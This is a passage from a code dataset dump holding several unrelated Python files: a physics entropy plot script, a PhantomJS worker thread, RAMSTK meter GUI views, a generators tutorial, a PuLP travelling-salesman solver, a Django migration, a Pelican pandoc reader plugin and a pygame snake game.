True\n","sub_path":"reproducibility_project/templates/ndcrc_scheduler.py","file_name":"ndcrc_scheduler.py","file_ext":"py","file_size_in_byte":4803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"386450378","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\nqs = [2, 3, 4, 5]\nls = [20, 25, 30, 35, 40]\nzs = []\n# number of circuit iterations, sample size\nN = 5\n\n# plot avg entropy as a function of iteration\nents_2d = []\n\n\nfor q in qs:\n    temp_ents = []\n    for L in ls:\n        # per-(q, L) accumulators over the N samples\n        avg_ents = []\n        middle_ents = []\n        before_mid_ents = []\n        after_mid_ents = []\n        for i in range(N):\n            filename = 'o' + str(L) + 'x10_q' + str(q) + '_e-13.txt'\n\n            with open(filename) as f:\n                # get the length of the MPS (one side of circuit)\n                line = f.readline()\n                n = int(line[4:])\n                # get the number of iterations 
(other side of circuit)\n m = int(f.readline()[4:])\n q = int(f.readline()[4:])\n for i in range(m):\n while 'iteration' not in line and line != '':\n line = f.readline()\n f.readline() # this says \"entropies\"\n line = f.readline() # this is the data\n ents = line.split(',')[:-1]\n ents = [float(e) for e in ents]\n # print(ents)\n if len(ents) > 0:\n avg_ents.append(np.average(ents))\n middle_ents.append(ents[n // 2])\n before_mid_ents.append(ents[(n // 2) - 1])\n after_mid_ents.append(ents[(n // 2) + 1])\n\n all_ents = [[middle_ents[i], after_mid_ents[i]] for i in range(len(middle_ents))]\n temp_ents.append(np.average(middle_ents[4:]))\n print(temp_ents)\n ents_2d.append(temp_ents)\nprint(ents_2d)\n\nfor i in range(len(qs)):\n plt.plot(ls, ents_2d[i], label=str(qs[i]))\n\nplt.legend()\nplt.show()\n","sub_path":"analyze_dist.py","file_name":"analyze_dist.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"295377624","text":"'''\nWorkerThread to run the external Program and capture the output.\n\n@author: Max Maass\n'''\nimport threading\nfrom subprocess import Popen, PIPE\nfrom sys import stderr\n\nclass Thread(threading.Thread):\n def __init__(self,pjs_path, ndjs_path, gen, ow, stat):\n \"\"\"Initialize Thread with the provided parameters\"\"\"\n threading.Thread.__init__(self)\n self.PHANTOMJS_PATH = pjs_path\n self.NETDOMAINS_PATH = ndjs_path\n self.GENERATOR = gen\n self.OUTWRITER = ow\n self.ERRWRITER = stderr\n self.STAT = stat\n self.RUN = True\n \n \n def run(self):\n \"\"\"run\n\n Main loop of the thread. Checks URLs using PhantomJS and saves the output.\n \"\"\"\n try:\n for self.url in self.GENERATOR: # Iterate through all URLs in the Generator\n if self.RUN: # If we are still active...\n try:\n self.output = self.runExternal(self.url) # We run the external program and capture the output\n self.OUTWRITER.writeOut(self.url, self.output[0].strip()) # Then write it to file\n if len(self.output[1]) != 0: # Something must have gone wrong. 
Notify\n                            self.ERRWRITER.write(\"ERROR: \" + self.url + \": \" + self.output[1].strip())\n                        self.STAT.done() # Notify progress bar\n                    except Exception as inst:\n                        self.ERRWRITER.write(str(type(inst)))\n                        self.ERRWRITER.write(str(inst))\n                else:\n                    return\n        except:\n            return\n    \n    def runExternal(self,url):\n        \"\"\"runExternal\n\n        Run PhantomJS on the provided URL.\n\n        @param url: The URL phantomjs should check.\n        \"\"\"\n        self.process = Popen([self.PHANTOMJS_PATH, self.NETDOMAINS_PATH, \"http://\" + url], stdout=PIPE, stderr=PIPE)\n        return self.process.communicate()\n    \n    def shutdown(self):\n        \"\"\"shutdown\n\n        Cleanly shut down the thread.\n        \"\"\"\n        self.RUN = False","sub_path":"src/Worker/WorkerThread.py","file_name":"WorkerThread.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"613676668","text":"with open(\"data.txt\", \"r\") as fa:\n    stra = fa.read()\n\nlista = stra.splitlines()\ncol_c = []\n\nfor line in lista:\n    temp = line.split()\n    col_c.append(temp[2])\n\nprint(col_c)\n","sub_path":"day4/files/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"269424671","text":"# -*- coding: utf-8 -*-\n#\n# ramstk.gui.gtk.workviews.components.Meter.py is part of the RAMSTK\n# Project\n#\n# All rights reserved.\n# Copyright 2007 - 2017 Doyle Rowland doyle.rowland <AT> reliaqual <DOT> com\n\"\"\"Meter Work View.\"\"\"\n\nfrom pubsub import pub\n\n# Import other RAMSTK modules.\nfrom ramstk.gui.gtk import ramstk\nfrom ramstk.gui.gtk.ramstk.Widget import _\nfrom ramstk.gui.gtk.workviews.components.Component import (AssessmentInputs,\n                                                           AssessmentResults)\n\n\nclass MeterAssessmentInputs(AssessmentInputs):\n    \"\"\"\n    Display Meter assessment input attribute data in the RAMSTK Work Book.\n\n    The Meter assessment input view displays all the assessment inputs for\n    the selected Meter item.  This includes, currently, inputs for\n    MIL-HDBK-217FN2.  The attributes of a Meter assessment input view are:\n\n    :cvar dict _dic_quality: dictionary of meter quality levels.  Key is\n        meter subcategory ID; values are lists of\n        quality levels.\n    :cvar dict _dic_type: dictionary of meter types.  Key is meter\n        subcategory ID; values are lists of types.\n    :cvar dict _dic_specification: dictionary of meter MIL-SPECs.  Key is\n        meter type ID; values are lists\n        of specifications.\n    :cvar dict _dic_insert: dictionary of meter insert materials. 
First\n        key is meter type ID, second key is meter\n        specification ID; values are lists of insert\n        materials.\n\n    :ivar cmbApplication: select and display the application of the meter.\n    :ivar cmbType: select and display the type of meter.\n\n    Callbacks signals in _lst_handler_id:\n\n    +-------+-------------------------------------------+\n    | Index | Widget - Signal                           |\n    +=======+===========================================+\n    |   0   | cmbQuality - `changed`                    |\n    +-------+-------------------------------------------+\n    |   1   | cmbApplication - `changed`                |\n    +-------+-------------------------------------------+\n    |   2   | cmbType - `changed`                       |\n    +-------+-------------------------------------------+\n    \"\"\"\n\n    # Define private dict attributes.\n    # Quality levels; key is the subcategory ID.\n    _dic_quality = {\n        2: [[\"MIL-SPEC\"], [_(u\"Lower\")]],\n        1: [[\"MIL-SPEC\"], [_(u\"Lower\")]],\n    }\n    # Meter types; key is the subcategory ID.\n    _dic_types = {\n        1: [[_(u\"AC\")], [_(u\"Inverter Driver\")], [_(u\"Commutator DC\")]],\n        2: [[_(u\"Direct Current\")], [_(u\"Alternating Current\")]]\n    }\n\n    def __init__(self, controller, **kwargs):\n        \"\"\"\n        Initialize an instance of the Meter assessment input view.\n\n        :param controller: the meter data controller instance.\n        :type controller: :class:`ramstk.meter.Controller.MeterBoMDataController`\n        :param int hardware_id: the hardware ID of the currently selected meter.\n        :param int subcategory_id: the ID of the meter subcategory.\n        \"\"\"\n        AssessmentInputs.__init__(self, controller, **kwargs)\n\n        # Initialize private dictionary attributes.\n\n        # Initialize private list attributes.\n        self._lst_labels.append(_(u\"Meter Type:\"))\n        self._lst_labels.append(_(u\"Meter Function:\"))\n\n        # Initialize private scalar attributes.\n\n        # Initialize public dictionary attributes.\n\n        # Initialize public list attributes.\n\n        # Initialize public scalar attributes.\n        self.cmbApplication = ramstk.RAMSTKComboBox(\n            index=0,\n            simple=True,\n            tooltip=_(u\"The application of the panel meter.\"))\n        self.cmbType = ramstk.RAMSTKComboBox(\n            index=0, simple=False, tooltip=_(u\"The type of meter.\"))\n\n        self._make_page()\n        self.show_all()\n\n        self._lst_handler_id.append(\n            self.cmbQuality.connect('changed', self._on_combo_changed, 0))\n        self._lst_handler_id.append(\n            self.cmbApplication.connect('changed', self._on_combo_changed, 1))\n        self._lst_handler_id.append(\n            self.cmbType.connect('changed', self._on_combo_changed, 2))\n\n    def _do_load_comboboxes(self, **kwargs):\n        \"\"\"\n        Load the meter RAMSTKComboBox()s.\n\n        This method is used to load the meter RAMSTKComboBox()s whenever\n        the meter subcategory is changed.\n\n        :param int subcategory_id: the newly selected meter subcategory ID.\n        :return: False if successful or True if an error is encountered.\n        :rtype: bool\n        \"\"\"\n        _subcategory_id = kwargs['subcategory_id']\n        _return = False\n\n        _attributes = AssessmentInputs.do_load_comboboxes(\n            self, subcategory_id=_subcategory_id)\n\n        # Load the quality level RAMSTKComboBox().\n        if _attributes['hazard_rate_method_id'] == 1:\n            _data = [[\"MIL-SPEC\"], [_(u\"Lower\")]]\n        else:\n            try:\n                _data = self._dic_quality[self._subcategory_id]\n            except KeyError:\n                _data = []\n        self.cmbQuality.do_load_combo(_data)\n\n        # Load the meter application RAMSTKComboBox().\n        self.cmbApplication.do_load_combo([[_(u\"Ammeter\")], [_(u\"Voltmeter\")],\n                                           [_(u\"Other\")]])\n\n        # Load the meter type RAMSTKComboBox().\n        try:\n            _data = self._dic_types[self._subcategory_id]\n        except KeyError:\n            _data = []\n        
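# an unrecognized subcategory leaves the meter type RAMSTKComboBox() empty\n        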
self.cmbType.do_load_combo(_data)\n\n return _return\n\n def _do_load_page(self, **kwargs):\n \"\"\"\n Load the Meter assessment input widgets.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n _attributes = AssessmentInputs.do_load_page(self, **kwargs)\n\n self.cmbApplication.handler_block(self._lst_handler_id[1])\n self.cmbApplication.set_active(_attributes['application_id'])\n self.cmbApplication.handler_unblock(self._lst_handler_id[1])\n\n self.cmbType.handler_block(self._lst_handler_id[2])\n self.cmbType.set_active(_attributes['type_id'])\n self.cmbType.handler_unblock(self._lst_handler_id[2])\n\n return _return\n\n def _do_set_sensitive(self, **kwargs): # pylint: disable=unused-argument\n \"\"\"\n Set widget sensitivity as needed for the selected meter.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n _attributes = self._dtc_data_controller.request_get_attributes(\n self._hardware_id)\n\n self.cmbType.set_sensitive(True)\n self.cmbApplication.set_sensitive(False)\n\n if (_attributes['hazard_rate_method_id'] == 2\n and _attributes['subcategory_id'] == 2):\n self.cmbApplication.set_sensitive(True)\n\n return _return\n\n def _make_page(self):\n \"\"\"\n Make the Meter class gtk.Notebook() assessment input page.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n self._do_load_comboboxes(subcategory_id=self._subcategory_id)\n self._do_set_sensitive()\n\n # Build the container for meters.\n _x_pos, _y_pos = AssessmentInputs.make_page(self)\n\n self.put(self.cmbType, _x_pos, _y_pos[1])\n self.put(self.cmbApplication, _x_pos, _y_pos[2])\n\n return None\n\n def _on_combo_changed(self, combo, index):\n \"\"\"\n Retrieve RAMSTKCombo() changes and assign to Meter attribute.\n\n This method is called by:\n\n * gtk.Combo() 'changed' signal\n\n :param combo: the RAMSTKCombo() that called this method.\n :type combo: :class:`ramstk.gui.gtk.ramstk.RAMSTKCombo`\n :param int index: the position in the signal handler list associated\n with the calling RAMSTKComboBox(). 
Indices are:\n\n +-------+------------------+-------+------------------+\n | Index | Widget | Index | Widget |\n +=======+==================+=======+==================+\n | 1 | cmbApplication | 2 | cmbType |\n +-------+------------------+-------+------------------+\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n combo.handler_block(self._lst_handler_id[index])\n\n _attributes = AssessmentInputs.on_combo_changed(self, combo, index)\n\n if _attributes:\n if index == 1:\n _attributes['application_id'] = int(combo.get_active())\n elif index == 2:\n _attributes['type_id'] = int(combo.get_active())\n\n self._dtc_data_controller.request_set_attributes(\n self._hardware_id, _attributes)\n\n combo.handler_unblock(self._lst_handler_id[index])\n\n return _return\n\n def on_select(self, module_id, **kwargs):\n \"\"\"\n Load the meter assessment input work view widgets.\n\n :param int module_id: the Meter ID of the selected/edited\n meter.\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n self._hardware_id = module_id\n\n self._do_set_sensitive(**kwargs)\n\n return self._do_load_page(**kwargs)\n\n\nclass MeterAssessmentResults(AssessmentResults):\n \"\"\"\n Display Meter assessment results attribute data in the RAMSTK Work Book.\n\n The Meter assessment result view displays all the assessment results\n for the selected meter. This includes, currently, results for\n MIL-HDBK-217FN2 parts count and MIL-HDBK-217FN2 part stress methods. The\n attributes of a meter assessment result view are:\n\n :ivar txtPiA: displays the application factor for the panel meter.\n :ivar txtPiF: displays the function factor for the panel meter.\n :ivar txtPiT: displays the temperature stress factor for the elapsed time\n meter.\n \"\"\"\n\n # Define private dict attributes.\n _dic_part_stress = {\n 2:\n u\"<span foreground=\\\"blue\\\">\\u03BB<sub>p</sub> = \\u03BB<sub>b</sub>\\u03C0<sub>A</sub>\\u03C0<sub>F</sub>\\u03C0<sub>Q</sub>\\u03C0<sub>E</sub></span>\",\n 1:\n u\"<span foreground=\\\"blue\\\">\\u03BB<sub>p</sub> = \\u03BB<sub>b</sub>\\u03C0<sub>T</sub>\\u03C0<sub>E</sub></span>\"\n }\n\n def __init__(self, controller, **kwargs):\n \"\"\"\n Initialize an instance of the Meter assessment result view.\n\n :param controller: the meter data controller instance.\n :type controller: :class:`ramstk.meter.Controller.MeterBoMDataController`\n \"\"\"\n AssessmentResults.__init__(self, controller, **kwargs)\n\n # Initialize private dictionary attributes.\n\n # Initialize private list attributes.\n self._lst_labels.append(u\"\\u03C0<sub>A</sub>:\")\n self._lst_labels.append(u\"\\u03C0<sub>F</sub>:\")\n self._lst_labels.append(u\"\\u03C0<sub>T</sub>:\")\n\n # Initialize private scalar attributes.\n self._lblModel.set_tooltip_markup(\n _(u\"The assessment model used to calculate the meter failure \"\n u\"rate.\"))\n\n # Initialize public dictionary attributes.\n\n # Initialize public list attributes.\n\n # Initialize public scalar attributes.\n self.txtPiA = ramstk.RAMSTKEntry(\n width=125,\n editable=False,\n bold=True,\n tooltip=_(u\"The application factor for the meter.\"))\n self.txtPiF = ramstk.RAMSTKEntry(\n width=125,\n editable=False,\n bold=True,\n tooltip=_(u\"The function factor for the meter.\"))\n self.txtPiT = ramstk.RAMSTKEntry(\n width=125,\n editable=False,\n bold=True,\n tooltip=_(u\"The temperature stress factor for the meter.\"))\n\n self._make_page()\n self.show_all()\n\n 
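# The subscription below keeps this results view current: any publisher\n # of 'calculatedHardware' that supplies the keyword arguments expected\n # by _do_load_page() will refresh the displayed factors, e.g.\n # pub.sendMessage('calculatedHardware', attributes=_attributes)\n # (illustrative call only; the actual publisher lives in the\n # calculation code, not in this module).\n 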
pub.subscribe(self._do_load_page, 'calculatedHardware')\n\n def _do_load_page(self, **kwargs):\n \"\"\"\n Load the meter assessment results page.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n _attributes = AssessmentResults.do_load_page(self, **kwargs)\n\n self.txtPiA.set_text(str(self.fmt.format(_attributes['piA'])))\n self.txtPiF.set_text(str(self.fmt.format(_attributes['piF'])))\n self.txtPiT.set_text(str(self.fmt.format(_attributes['piT'])))\n\n return _return\n\n def _do_set_sensitive(self, **kwargs):\n \"\"\"\n Set widget sensitivity as needed for the selected meter.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n _return = False\n\n # Pass the keyword arguments through as keywords, not as positionals.\n AssessmentResults.do_set_sensitive(self, **kwargs)\n _attributes = self._dtc_data_controller.request_get_attributes(\n self._hardware_id)\n\n self.txtPiA.set_sensitive(False)\n self.txtPiF.set_sensitive(False)\n self.txtPiT.set_sensitive(False)\n\n if _attributes['hazard_rate_method_id'] == 2:\n self.txtPiE.set_sensitive(True)\n if self._subcategory_id == 2:\n self.txtPiA.set_sensitive(True)\n self.txtPiF.set_sensitive(True)\n elif self._subcategory_id == 1:\n self.txtPiT.set_sensitive(True)\n self.txtPiQ.set_sensitive(False)\n\n return _return\n\n def _make_page(self):\n \"\"\"\n Make the meter gtk.Notebook() assessment results page.\n\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n self._do_set_sensitive()\n\n # Build the container for meters.\n _x_pos, _y_pos = AssessmentResults.make_page(self)\n\n self.put(self.txtPiA, _x_pos, _y_pos[3])\n self.put(self.txtPiF, _x_pos, _y_pos[4])\n self.put(self.txtPiT, _x_pos, _y_pos[5])\n\n return None\n\n def on_select(self, module_id, **kwargs):\n \"\"\"\n Load the meter assessment results work view widgets.\n\n :param int module_id: the Meter ID of the selected/edited\n meter.\n :return: False if successful or True if an error is encountered.\n :rtype: bool\n \"\"\"\n self._hardware_id = module_id\n\n self._do_set_sensitive(**kwargs)\n\n return self._do_load_page(**kwargs)\n","sub_path":"src/ramstk/gui/gtk/workviews/components/Meter.py","file_name":"Meter.py","file_ext":"py","file_size_in_byte":14683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"501173587","text":"#!/usr/bin/env python\n\n# Use generators to avoid crashes in memory when you need to iterate over a large set of data\n\n# Generators can be built with the syntax of list comprehensions but inside ()\nnames = ['Tim', 'Mark', 'Donna', 'Albert', 'Sara']\ngen_a = (len(n) for n in names)\n\nprint(next(gen_a))\nprint(next(gen_a))\n\n\n# You define a generator function, using the yield keyword to return a value\ndef my_generator():\n names = ['Gianluca', 'Lisa', 'Sofia', 'Giulia']\n for i in names:\n yield i\n\n\n# You define a generator iterator as an instance of the function\ngen = my_generator()\n\n# You call next to generate the next value\nprint(next(gen))\nprint(next(gen))\n\n# Since the generator is an iterator you can use it in a for loop as well\n# note that we keep generating from where we left off\nfor val in gen:\n print(val)\n\n# Remember: generators are used to generate the next value,\n# they allow you to iterate over values without having to load them\n# in memory. That's a key difference from a function where you\n# only get a chance to return all results at the same time.\n# For example:\n# 1. 
when you read a file the built in mechanism is a generator\n# 2. the xrange uses a generator\n\n# yield: what it does is save the \"state\" of a generator function\n","sub_path":"samples/generators/demo_generators.py","file_name":"demo_generators.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"122004384","text":"from pulp import *\nimport numpy as np\nimport pandas as pd\n\ndf=pd.read_csv('problem1.csv')\n#df\n\n\nnvar=6*6\ncity=[1,2,3,4,5,6]\ndist=df.iloc[0:6,0:6].to_numpy()\nprint(dist)\ndist1 = df.to_numpy()\nprint(dist1)\ncost = dict(((a,b),dist[a-1][b-1]) for a in city for b in city if a!=b)\nprint(cost)\nmodel=LpProblem(\"lp\",LpMinimize)\nx = LpVariable.dicts('x',cost, 0,1,LpBinary)\nmodel+=lpSum([x[(i,j)]*cost[(i,j)] for (i,j) in cost])\n\nfor k in city:\n model+= lpSum([ x[(i,k)] for i in city if (i,k) in x]) ==1 ##i to j\n model+=lpSum([ x[(k,i)] for i in city if (k,i) in x]) ==1 ##j to i\n\nz = LpVariable.dicts('z', city, 0, len(city)-1, LpInteger)\nfor i in city:\n for j in city:\n if i != j and (i != 1 and j!= 1) and (i,j) in x:\n model += z[i] - z[j] <= (6)*(1-x[(i,j)]) - 1\nmodel\n\nstatus=model.solve(PULP_CBC_CMD(msg=0))\n\nprint(f\"status: {model.status},{LpStatus[model.status]}\")\nprint(f\"Objective= {model.objective.value()}\")\n\nfor var in x.values():\n print(\"{}={}\".format(var.name,var.value()))\n\nfor var in z.values():\n print(\"{}={}\".format(var.name,var.value()))\n\n\nstarting_city = 1\ns_route=[]##shortest route\ns_route.append(city.pop(0))\n\nwhile len(city) > 0:\n\n for k in city:\n if x[(starting_city,k)].varValue ==1:\n s_route.append( city.pop( city.index(k)))\n starting_city=k\n break\n\ns_route.append(1)\nprint(s_route)\nshortest_route_length = [cost[(s_route[i-1], s_route[i])] for i in range(1,len(s_route))]\n\nprint('Shortest Path Travelling by Mr.Iyer :')\nflag=True\nfor cty in s_route:\n if flag:\n print(cty,end='')\n flag = False\n else:\n print(f' -> {cty}',end='')\nprint(f\"\\nMinimum cost of the tour for mr.Iyer from his home city to travel other 5 \\\ncities with min cost and returning back to its home city :{sum(shortest_route_length)}\")","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"583509164","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Cliente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ('apellido', models.CharField(max_length=50)),\n ('direccion', models.CharField(max_length=150)),\n ('telefono', models.CharField(help_text=b'Ejemplo de telefono: 03492-412589', max_length=12)),\n ('celular', models.CharField(help_text=b'Ejemplo de celular: 03492-15896324', max_length=14)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Empleado',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ('apellido', models.CharField(max_length=50)),\n ('dni', models.CharField(max_length=8)),\n ('direccion', models.CharField(max_length=150)),\n 
('telefono', models.CharField(help_text=b'Ejemplo de telefono: 03492-412589', max_length=12)),\n ('celular', models.CharField(help_text=b'Ejemplo de celular: 03492-15896324', max_length=14)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Evento',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateField()),\n ('cliente', models.ForeignKey(to='sitio.Cliente')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Historial',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('pago', models.IntegerField()),\n ('empleado', models.ForeignKey(to='sitio.Empleado')),\n ('evento', models.ForeignKey(to='sitio.Evento')),\n ],\n options={\n 'verbose_name_plural': 'Historiales',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Localidad',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigopostal', models.IntegerField()),\n ('nombre', models.CharField(max_length=50)),\n ],\n options={\n 'verbose_name_plural': 'Localidades',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Presupuesto',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateField(default=datetime.date(2015, 2, 11))),\n ('importe', models.IntegerField()),\n ('evento', models.OneToOneField(to='sitio.Evento')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Producto',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=100)),\n ('cantidad', models.IntegerField()),\n ('imagen', models.ImageField(null=True, upload_to=b'url', blank=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Salon',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.TextField(max_length=100)),\n ('direccion', models.CharField(max_length=100)),\n ('localidad', models.ForeignKey(to='sitio.Localidad')),\n ],\n options={\n 'verbose_name_plural': 'Salones',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='presupuesto',\n name='producto',\n field=models.ManyToManyField(to='sitio.Producto'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='evento',\n name='salon',\n field=models.ForeignKey(to='sitio.Salon'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='localidad',\n field=models.ForeignKey(to='sitio.Localidad'),\n preserve_default=True,\n ),\n ]\n","sub_path":"jcc/apps/sitio/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"190048141","text":"import subprocess\nfrom pelican import signals\nfrom pelican.readers import BaseReader\nfrom pelican.utils import pelican_open\nfrom yaml import load\ntry:\n from yaml import CLoader as Loader\nexcept ImportError:\n from yaml import Loader\n\nfrom datetime import datetime\n\nclass PandocReader(BaseReader):\n enabled = True\n file_extensions = ['md', 'markdown', 'mkd', 'mdown']\n\n def read(self, filename):\n with pelican_open(filename) as fp:\n 
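# Split the source into a tuple of lines so the metadata block, delimited\n # by a \"...\" line and a later \"---\" line, can be located by index and\n # parsed as YAML before the remaining body is handed to pandoc.\n 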
text = tuple(fp.splitlines())\n\n metadata = {}\n init = text.index(\"...\")\n end = text[init:].index(\"---\") + init\n\n metatext = \"\\n\".join(text[init+1:end])\n metadata = load(metatext, Loader=Loader)\n\n if \"Date\" in metadata:\n # Back to string because PyYaml is way too clever\n metadata[\"Date\"] = metadata[\"Date\"].isoformat()\n\n finalmeta = {}\n for k,v in metadata.items():\n finalmeta[k.lower()] = self.process_metadata(k.lower(),v)\n\n content = \"\\n\".join(text[:init] + text[end+1:])\n\n extra_args = self.settings.get('PANDOC_ARGS', [])\n extensions = self.settings.get('PANDOC_EXTENSIONS', '')\n if isinstance(extensions, list):\n extensions = ''.join(extensions)\n\n pandoc_cmd = [\"pandoc\", \"--from=markdown\" + extensions, \"--to=html5\"]\n pandoc_cmd.extend(extra_args)\n\n proc = subprocess.Popen(pandoc_cmd,\n stdin = subprocess.PIPE,\n stdout = subprocess.PIPE)\n\n output = proc.communicate(content.encode('utf-8'))[0].decode('utf-8')\n status = proc.wait()\n if status:\n raise subprocess.CalledProcessError(status, pandoc_cmd)\n\n # Need that to make {static} -like tags be available\n output = output.replace(\"%7B\", \"{\")\n output = output.replace(\"%7D\", \"}\")\n\n return output, finalmeta\n\ndef add_reader(readers):\n for ext in PandocReader.file_extensions:\n readers.reader_classes[ext] = PandocReader\n\ndef register():\n signals.readers_init.connect(add_reader)\n","sub_path":"pandoc_reader.py","file_name":"pandoc_reader.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"567867657","text":"import pygame\nfrom letters import numSelect\nimport random\n\npygame.init()\n\n# RGB Colors\nblack = (0,0,0)\nwhite = (255,255,255)\n\ndisplay_width, display_height = 1000, 500\n\n#create main game frame \ngameDisplay = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption('PITHON')\nclock = pygame.time.Clock()\ncrashed = False\n\n#set count to 0\ncount = 0\n\n\n\ndef numDisplay(number, x, y):\n gameDisplay.blit(number, (x, y))\n\ndef score(count):\n font = pygame.font.SysFont(None, 25)\n text = font.render(\"Score: \" +str(count), True, black)\n gameDisplay.blit(text, [display_width/2,25])\n \ndef pithon():\n#sets image width\n number_width = 50\n#initial number starting position\n image_x, image_y = display_width/2, display_height/2\n pi_string = [\"images/three.png\",\"images/one.png\",\"images/four.png\"]\n snake_position = [[image_x, image_y], [image_x, image_y], [image_x+number_width, image_y]]\n x_change, y_change = -50, 0\n#determines starting position in array to pull from letters\n count = 2\n randCount = random.randrange(1,9)\n while randCount == count:\n randCount = random.randrange(1,9)\n#determines starting food position\n food_x, food_y = random.randrange(number_width,display_width-number_width,number_width), random.randrange(number_width,display_height-number_width,number_width)\n rfood_x, rfood_y = random.randrange(number_width,display_width-number_width,number_width), random.randrange(number_width,display_height-number_width,number_width)\n crashed = False\n\n\n while not crashed:\n#allows the user to quit the game\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n\n#makes the frame background white\n gameDisplay.fill(white)\n#sets initial game score\n score(count-2)\n\n#creates next snake body part on screen\n food = numSelect()\n numDisplay(pygame.image.load(food.piDigit(count+1)), 
food_x, food_y)\n \n#creates fake snake body part on screen\n snakefood = numSelect()\n numDisplay(pygame.image.load(snakefood.piDigit(randCount)), rfood_x, rfood_y)\n\n#generates snake body\n [numDisplay(pygame.image.load(pi_string[x]), snake_position[x][0], snake_position[x][1]) for x in range(1,len(pi_string))] \n\n#creates user controls\n\n \n if event.type == pygame.KEYDOWN:\n \n if event.key == pygame.K_LEFT and x_change == 0:\n x_change = -number_width\n y_change = 0\n elif event.key == pygame.K_RIGHT and x_change == 0:\n x_change = number_width\n y_change = 0\n elif event.key == pygame.K_UP and y_change == 0:\n y_change = -number_width\n x_change = 0\n elif event.key == pygame.K_DOWN and y_change == 0:\n y_change = number_width\n x_change = 0\n\n snake_position[0][0] += x_change\n snake_position[0][1] += y_change\n\n#for loop to shift everything up one\n\n for x in reversed(range(1,len(pi_string))):\n snake_position[x][0] = snake_position[x-1][0]\n snake_position[x][1] = snake_position[x-1][1]\n \n#if statement to detect food collision\n if food_x == snake_position[0][0] and food_y == snake_position[0][1]:\n count +=1\n randCount = random.randrange(1,9)\n food_x, food_y = -100, -100\n pi_string.append(food.piDigit(count))\n snake_position.append([food_x,food_y])\n# y_position.append(food_y)\n food_x = random.randrange(number_width*2,display_width-number_width*2,number_width)\n food_y = random.randrange(number_width*2,display_height-number_width*2,number_width)\n rfood_x, rfood_y = random.randrange(number_width,display_width-number_width,number_width), random.randrange(number_width,display_height-number_width,number_width) \n while [food_x,food_y] in snake_position:\n food_x = random.randrange(number_width*2,display_width-number_width*2, number_width)\n food_y = random.randrange(number_width*2,display_height-number_width*2, number_width)\n rfood_x, rfood_y = random.randrange(number_width,display_width-number_width,number_width), random.randrange(number_width,display_height-number_width,number_width)\n while randCount == count:\n randCount = random.randrange(1,9)\n\n\n#draws snake head\n numDisplay(pygame.image.load(pi_string[0]), snake_position[0][0], snake_position[0][1])\n\n#ends game if snake hits edge\n\n if snake_position[0][0] > display_width-number_width or snake_position[0][0] < 0+number_width or snake_position[0][1] > display_height-number_width or snake_position[0][1] < 0+number_width:\n crashed = True\n 